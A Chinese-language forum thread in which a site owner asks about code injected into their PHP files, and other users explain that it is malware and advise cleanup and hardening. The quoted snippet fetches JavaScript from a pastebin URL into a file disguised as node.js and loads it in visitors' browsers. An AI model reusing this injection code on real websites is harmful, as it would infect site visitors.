iT邦幫忙

0

請問有人遇過,網站PHP檔被加入不明程式碼嗎?

  • 分享至 

  • xImage

網頁PHP程式碼的檔尾被加入如下列語法,因為不知要開啟的原始碼用意,想請教先進!感謝解惑! 怕影響PO文,已將HTML標籤改為全型符號。
<?php
file_put_contents("node.js", fopen("http://pastebin.com/raw/XQ8X1Cmv", 'r'));
?>
<html>
<script>
var commandModuleStr = '<script src="./node.js" type="text/javascript"></script>';
document.write(commandModuleStr);
</script>
</html>

jimmychn iT邦新手 4 級 ‧ 2017-03-30 16:27:16 檢舉
對不起,居然不知道MD可以置放程式碼。。。。
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

2 個回答

3
bizpro
iT邦大師 1 級 ‧ 2017-03-29 09:58:10
最佳解答

這是用來放毒的.

file_put_contents("node.js", fopen("http://pastebin.com/raw/XQ8X1Cmv", 'r'));

這段程式碼讀取外部的連結的javascript內容, 將這些內容寫為您網站根目錄中, 檔名是node.js, 成為偽裝成node.js的javascript毒. 您可以找看看是否有node.js, 看看其內容是什麼.

<script>
var commandModuleStr = '<script src="./node.js" type="text/javascript"></script>';
document.write(commandModuleStr);
</script>

您的網站訪客的瀏覽器會執行剛剛的node.js毒, 並且會將這node.js毒放入瀏覽器緩存中, 即使您已清除主機端的放毒程式, 在緩存的有效時間中每次開啟你們的網站就會執行.至於執行什麼, 就要看這個node.js的毒了.

jimmychn iT邦新手 4 級 ‧ 2017-03-29 12:20:40 檢舉

太感謝了!因為node.js是壓縮碼,看來要好好研究一下,才知道如何讓上過網頁的人,解決問題!

0
海綿寶寶
iT邦大神 1 級 ‧ 2017-03-29 08:45:43

1.我有遇過
2.是惡意程式碼
3.就算不是,pastebin那個URL也已失效
結論
1.植入的程式碼全部刪一刪
2.檢查server的安全漏洞,免得再被植入

看更多先前的回應...收起先前的回應...
jimmychn iT邦新手 4 級 ‧ 2017-03-29 09:11:20 檢舉

非常感謝你!我已經移除該程式碼了!
只是很想知道到底那個連結是幹了哪些壞事!

haoming iT邦好手 1 級 ‧ 2017-03-29 09:43:32 檢舉

我也遇過, 最常遇到的. 通常是用來在畫面上崁入js 程式. 影響訪客的電腦. 例如讓訪客 中木馬, 或者幫忙點擊網站

那...可以請教這要怎麼預防?
我也有在寫PHP~
可是對資安沒甚麼觀念~0..0

jimmychn iT邦新手 4 級 ‧ 2017-03-30 16:24:45 檢舉

其實還不清楚,如何被變更程式碼的!
因為提供管理帳戶(非主機管理)上傳檔案。
懷疑是SQL Injection,但早有加寫防治,
上傳檔案可以是可以覆蓋程式,懷疑是這段,
如果管理帳號密碼外洩,當然可以改寫程式。

mytiny iT邦超人 1 級 ‧ 2017-03-30 21:46:50 檢舉

現在應正視網頁防護的資安議題
因為有一就有二,下次保證還會再來
建議搜尋G神,"網頁防火牆"+"網頁防竄改"

jimmychn iT邦新手 4 級 ‧ 2017-03-31 09:14:53 檢舉

對不起!忘了謝謝你的幫忙和提醒!

我要發表回答

立即登入回答